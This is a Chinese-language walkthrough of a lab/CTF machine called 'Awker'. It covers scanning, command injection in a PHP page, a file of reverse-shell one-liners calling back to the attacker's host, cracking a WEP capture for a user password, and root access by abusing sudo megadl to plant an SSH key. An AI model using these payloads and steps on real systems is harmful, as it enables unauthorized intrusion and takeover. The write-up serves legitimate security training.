一、信息收集

主机发现

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:03       (Unknown: locally administered)
192.168.56.100  08:00:27:47:17:7f       (Unknown)
192.168.56.139  08:00:27:d9:2c:bc       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.882 seconds (136.03 hosts/sec). 3 responded

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.56.139 -p-       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 11:32 EDT
Nmap scan report for 192.168.56.139
Host is up (0.00073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D9:2C:BC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 21.05 seconds

80端口

image-20250506233458432

gobuster 进行目录扫描 发现有一个learning.php

image-20250506233920271

执行 awk '{print $1}' sample_data.txt;ls有命令注入

image-20250506234014491

还有wget命令

image-20250506234127256

反弹shell的方式我从自己的kali上面拿了一个shell.sh过来

shell.sh的内容

1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash

bash -i >& /dev/tcp/192.168.56.103/7777 0>&1 || \
/bin/bash -i > /dev/tcp/192.168.56.103/7777 0<& 2>&1 || \
exec /bin/sh 0</dev/tcp/192.168.56.103/7777 1>&0 2>&0 || \
0<&196;exec 196<>/dev/tcp/192.168.56.103/7777; sh <&196 >&196 2>&196 || \
0<&196;exec 196<>/dev/tcp/192.168.56.103/7777; sh <&196 >&196 2>&196 || \
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.56.103 7777 0/tmp/p 2>&1 || \
telnet 192.168.56.103 7777 | /bin/bash | telnet 192.168.56.103 444 || \
rm -f f; mkfifo f; cat f | /bin/sh -i 2>&1 | telnet 192.168.56.103 7777 > f || \
rm -f x; mknod x p && telnet 192.168.56.103 7777 0<x | /bin/bash 1>x

这样拿了一个shell

image-20250506234740575

1
2
3
www-data@Awker:/home/welcome$ ls
WEP-capture.pcap
user.txt

/home/welcome目录中有一个WEP-capture.pcap文件, 用nc将它下载了下来

接收端执行

1
nc -l -p 12345 > received_file

发送端执行

1
nc 192.168.1.100 12345 < WEP-capture.pcap

用wireshark打开后是一段wifi流量

image-20250506235247179

aircrack-ng跑出了key

image-20250506235210491

然后把流量解开了

image-20250506235341849

这里看着流量包也不知道改干什么了,就去找群主要了一个提示😁

key就是welcome的密码

1
2
3
4
5
6
7
www-data@Awker:/home/welcome$ su welcome
su welcome
Password: MYKEY
whoami
welcome
id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

二、提权

sudo -l看一下可以执行/usr/bin/megadl

1
2
3
4
5
6
7
sudo -l
Matching Defaults entries for welcome on Awker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Awker:
    (ALL) NOPASSWD: /usr/bin/megadl

megadl 是一个命令行工具,用来从 MEGA 云盘下载文件。

解法1

这个是我的解法

我当时就想到了 往root.ssh中下载一个公钥,但是文件存在无法覆盖

image-20250507000738085

这里确实卡了一段时间

我之前经常记不全authorized_keys文件的名字, 经常使用cat /etc/ssh/sshd_config | grep au这个命令来看文件名

所以我有一个印象AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2这一行有俩文件名

所以我就尝试写了一个authorized_keys2

image-20250507000830237

OK,下载成功了

我这里就试了一下 ssh

然后真的登录进去了

image-20250507000430388

解法2

这个解法是我在临时群看到的

使用--config命令读取公钥文件 公钥文件里面存放了一个密码

image-20250507000952810